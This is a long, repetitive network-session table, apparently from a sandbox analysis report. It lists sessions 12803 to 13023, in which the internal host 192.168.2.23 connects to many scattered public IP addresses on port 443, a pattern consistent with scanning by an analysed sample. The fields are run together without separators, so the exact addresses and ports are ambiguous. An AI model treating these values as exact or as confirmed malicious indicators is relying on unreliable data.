                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12803192.168.2.2345464193.118.143.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12804192.168.2.2349448194.180.62.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12805192.168.2.233450266.193.170.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12806192.168.2.2346982108.176.241.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12807192.168.2.234718644.191.113.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12808192.168.2.2343566218.211.149.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12809192.168.2.235546659.230.204.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12810192.168.2.2340236114.200.249.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12811192.168.2.2349188190.111.103.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12812192.168.2.2337524150.28.78.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12813192.168.2.234630831.114.150.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12814192.168.2.2358002154.122.106.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12815192.168.2.2352582218.101.83.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12816192.168.2.2356262148.45.190.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12817192.168.2.234397050.195.207.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12818192.168.2.234372612.237.208.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12819192.168.2.2355530144.161.152.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12820192.168.2.2357564211.57.213.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12821192.168.2.2351842189.169.97.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12822192.168.2.2351168161.106.254.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12823192.168.2.2340068148.105.220.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12824192.168.2.2356068181.252.74.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12825192.168.2.2339644202.192.245.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12826192.168.2.2358452140.6.28.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12827192.168.2.235978046.204.230.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12828192.168.2.2339848157.40.212.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12829192.168.2.235369061.48.202.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12830192.168.2.233997214.57.139.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12831192.168.2.234192687.143.20.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12832192.168.2.234554613.89.62.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12833192.168.2.2337468110.154.248.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12834192.168.2.2353842154.87.21.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12835192.168.2.2339660169.54.150.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12836192.168.2.2349470151.74.100.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12837192.168.2.234204458.94.251.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12838192.168.2.235571891.127.64.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12839192.168.2.2350634130.2.169.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12840192.168.2.2352150135.9.21.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12841192.168.2.2349302147.50.118.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12842192.168.2.2346008177.108.1.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12843192.168.2.2344338148.120.153.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12844192.168.2.235950298.132.205.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12845192.168.2.23395665.141.237.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12846192.168.2.2359860121.5.149.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12847192.168.2.234746877.47.146.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12848192.168.2.234406283.105.69.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12849192.168.2.2345736197.63.132.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12850192.168.2.2347432151.118.212.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12851192.168.2.235691017.100.154.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12852192.168.2.23475661.201.183.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12853192.168.2.2350154221.213.12.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12854192.168.2.2334126200.49.133.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12855192.168.2.2343222154.165.189.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12856192.168.2.235515840.169.222.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12857192.168.2.234322079.185.116.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12858192.168.2.2335718133.23.67.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12859192.168.2.2349792191.188.165.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12860192.168.2.2347156150.137.183.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12861192.168.2.233441861.73.138.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12862192.168.2.235018213.100.44.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12863192.168.2.235975490.84.45.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12864192.168.2.235906436.82.208.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12865192.168.2.2356310160.184.152.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12866192.168.2.2344686201.242.47.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12867192.168.2.2336656135.186.23.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12868192.168.2.234498870.212.147.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12869192.168.2.2333384175.78.33.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12870192.168.2.233981271.89.124.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12871192.168.2.2357690137.54.144.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12872192.168.2.2349548153.48.53.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12873192.168.2.23542528.89.81.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12874192.168.2.2354690210.83.224.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12875192.168.2.236022635.206.199.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12876192.168.2.2351378120.45.106.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12877192.168.2.2350850217.97.213.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12878192.168.2.235382842.228.248.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12879192.168.2.2335310155.235.0.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12880192.168.2.234699897.216.93.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12881192.168.2.2348362135.94.223.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12882192.168.2.234470879.60.42.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12883192.168.2.2356056167.227.111.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12884192.168.2.2341434126.177.172.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12885192.168.2.2340638125.18.214.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12886192.168.2.2340904205.176.71.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12887192.168.2.234305065.17.75.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12888192.168.2.233972447.52.129.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12889192.168.2.233401671.255.31.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12890192.168.2.2339576221.144.152.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12891192.168.2.234921666.35.116.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12892192.168.2.2350666138.194.219.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12893192.168.2.2333240136.32.66.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12894192.168.2.235987682.191.170.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12895192.168.2.2353426135.66.147.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12896192.168.2.233759625.86.228.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12897192.168.2.2350984110.133.3.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12898192.168.2.2357156125.159.16.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12899192.168.2.2342644143.111.117.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12900192.168.2.235705047.188.164.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12901192.168.2.234806652.86.231.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12902192.168.2.2349996202.35.113.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12903192.168.2.2333566186.100.56.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12904192.168.2.2341738206.23.197.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12905192.168.2.234281666.80.130.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12906192.168.2.2356992126.158.70.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12907192.168.2.2345844159.180.169.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12908192.168.2.235026212.162.246.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12909192.168.2.2358580222.180.240.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12910192.168.2.235393668.239.57.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12911192.168.2.2349604145.3.39.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12912192.168.2.234384820.141.1.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12913192.168.2.2353220187.42.45.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12914192.168.2.235466489.194.132.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12915192.168.2.2356440221.62.114.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12916192.168.2.2339414163.169.177.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12917192.168.2.236074823.17.34.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12918192.168.2.2343888193.241.154.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12919192.168.2.2339004118.224.243.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12920192.168.2.2351612181.64.111.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12921192.168.2.234333635.74.206.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12922192.168.2.233516060.178.254.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12923192.168.2.2339784138.212.81.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12924192.168.2.2338306202.205.142.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12925192.168.2.2348818220.155.174.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12926192.168.2.233437012.110.233.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12927192.168.2.2334604151.49.125.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12928192.168.2.233454237.155.65.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12929192.168.2.2338648124.49.194.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12930192.168.2.2355968146.143.212.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12931192.168.2.2360582167.142.44.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12932192.168.2.2348124187.129.116.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12933192.168.2.2353410194.134.165.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12934192.168.2.2357956159.211.166.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12935192.168.2.2346048172.90.94.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12936192.168.2.233686276.212.109.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12937192.168.2.2342720114.184.6.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12938192.168.2.234541863.125.55.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12939192.168.2.235659644.37.153.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12940192.168.2.235526835.29.230.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12941192.168.2.2341762118.191.216.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12942192.168.2.235974468.224.191.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12943192.168.2.2339170121.106.111.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12944192.168.2.2337792210.19.92.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12945192.168.2.2356150181.174.43.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12946192.168.2.236053647.182.243.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12947192.168.2.236017892.68.154.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12948192.168.2.2359276137.229.19.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12949192.168.2.23372241.180.11.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12950192.168.2.2335278145.106.5.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12951192.168.2.234238247.5.136.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12952192.168.2.2335056164.176.205.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12953192.168.2.234196271.135.51.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12954192.168.2.234888238.158.195.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12955192.168.2.233377243.81.252.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12956192.168.2.2353730207.167.87.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12957192.168.2.233347817.47.73.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12958192.168.2.233715479.128.29.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12959192.168.2.2353822167.198.123.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12960192.168.2.2345922193.183.78.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12961192.168.2.2355422130.144.72.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12962192.168.2.2359296150.223.96.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12963192.168.2.2339742216.79.223.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12964192.168.2.2351900151.86.99.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12965192.168.2.233299850.92.245.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12966192.168.2.233889679.119.74.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12967192.168.2.2355210185.80.18.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12968192.168.2.2359930192.33.115.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12969192.168.2.234333642.11.158.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12970192.168.2.2359408197.235.26.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12971192.168.2.2352202150.246.241.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12972192.168.2.2359398168.111.5.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12973192.168.2.2350738144.165.15.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12974192.168.2.2339986121.166.57.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12975192.168.2.235583472.106.188.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12976192.168.2.2340480211.74.54.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12977192.168.2.2342350113.164.197.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12978192.168.2.234419682.196.102.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12979192.168.2.2352002129.184.32.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12980192.168.2.235133635.67.19.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12981192.168.2.233917446.161.105.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12982192.168.2.235672040.205.125.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12983192.168.2.2360732126.128.170.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12984192.168.2.2354146116.26.255.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12985192.168.2.2356352210.51.30.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12986192.168.2.2348522222.234.44.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12987192.168.2.2358156188.174.128.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12988192.168.2.235141890.109.117.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12989192.168.2.234125080.90.190.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12990192.168.2.2359948199.175.148.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12991192.168.2.233298866.92.233.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12992192.168.2.2351946187.192.69.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12993192.168.2.2344752166.111.37.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12994192.168.2.2349388205.131.137.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12995192.168.2.234520075.199.14.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12996192.168.2.235229451.226.222.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12997192.168.2.234867849.174.132.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12998192.168.2.235719636.101.233.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12999192.168.2.2352582119.92.146.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13000192.168.2.234523891.33.208.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13001192.168.2.233281264.71.142.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13002192.168.2.2342908126.241.143.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13003192.168.2.2347016149.210.80.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13004192.168.2.234212086.110.221.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13005192.168.2.235836027.112.172.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13006192.168.2.235391439.11.185.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13007192.168.2.233713258.94.191.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13008192.168.2.235745651.160.215.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13009192.168.2.23562205.26.29.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13010192.168.2.2347010113.251.20.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13011192.168.2.2348658155.128.135.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13012192.168.2.2339054186.143.139.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13013192.168.2.233860414.253.180.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13014192.168.2.234874625.117.96.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13015192.168.2.2341760201.142.97.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13016192.168.2.2334332131.94.183.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13017192.168.2.2352734136.234.202.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13018192.168.2.2334606129.28.66.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13019192.168.2.2351938129.58.246.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13020192.168.2.2341680113.94.99.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13021192.168.2.2349814105.204.199.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13022192.168.2.2359334139.124.191.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13023192.168.2.234118453.226.17.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
